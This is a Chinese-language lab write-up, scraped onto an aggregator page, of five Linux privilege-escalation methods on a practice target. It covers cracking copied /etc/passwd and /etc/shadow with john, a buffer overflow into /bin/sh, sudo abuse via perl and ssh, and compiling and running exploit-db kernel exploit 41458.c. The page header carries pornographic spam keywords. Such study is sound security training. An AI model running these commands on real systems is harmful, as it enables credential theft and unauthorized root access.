日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

靶场提权记录

發布時間:2024/9/30 编程问答 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 靶场提权记录 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

目錄

1,下載 靶場的? /etc/passwd 文件 和 /etc/shadow 文件 并破解??

2, 利用 C語言程序溢出漏洞進行提權(前提是 程序中具有 代碼執行函數? execve())

3,在本地登錄 ssh 實現提權

4,使用 perl命令提權

5,利用 ubuntu 4.4.0內核 溢出 提權


1,下載 靶場的? /etc/passwd 文件 和 /etc/shadow 文件 并破解??

download /etc/passwd download /etd/shadow

直接用 john 進行暴力破解

john shadow

如果不成功,嘗試先把文件轉換為john可以識別的文件格式:

unshadow password shadow > crackedjohn cracked

獲得用戶名和密碼后,先切換到破解出來的用戶,然后再切換到root

su - username //切換到 得到的用戶 Password:123123sudo su Password:123123

2, 利用 C語言程序溢出漏洞進行提權(前提是 程序中具有 代碼執行函數? execve())

在使用ssh登錄后發現 當前目錄中有一個 read_message.c 文件

?

大致意思: 如果輸入的 字符串 的前五個字符 跟 Simon 相同的 就執行?

execve(program,null,null) 執行 usr/local/sbin/message

輸入Simonaaaaaa 后給了一些提示

那溢出之后 會不會執行我們溢出后的命令呢??(數組的大小為 20 )

試一下:輸入 Simonaaaaaaaaaaaaaaa/bin/sh? 使程序溢出,從而執行跳轉到/bin/sh下

我們真的提升了權限,成為了root權限

?

3,在本地登錄 ssh 實現提權

如果使用命令執行 在 /home/luoaho? 目錄下發現了 .ssh 目錄就可以使用?

ssh luohao@localhost sudo -l

不需要輸入密碼就可以提升到 root 權限

4,使用 perl命令提權

查看用戶的sudo權限發現可以使用perl命令:

使用perl命令提權:
?

sudo perl -e "exec '/bin/sh'" //運行shbash -i //以交互模式運行bash

實例:成功提升到 root權限

5,利用 ubuntu 4.4.0內核 溢出 提權

查找漏洞利用代碼:

searchsploit ubuntu 4.4.0

使用 第三個 41458.c文件

復制41458.c 內核溢出代碼 到 桌面, 并將腳本編譯成計算機能夠執行的文件

cp /usr/share/exploitdb/exploits/linux/local/41458.c /root/desktop/1234.cgcc 1234.c -o shellroot

將shellroot 上傳到 靶機

upload /root/desktop/shellroot

然后在shell 命令下 將shellroot 添加可執行權限

chmod 777 shellroot //賦予文件全部權限

執行shellroot

./shellroot

執行成功 ,已經變成了root權限,可以干壞事了

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

總結

以上是生活随笔為你收集整理的靶场提权记录的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。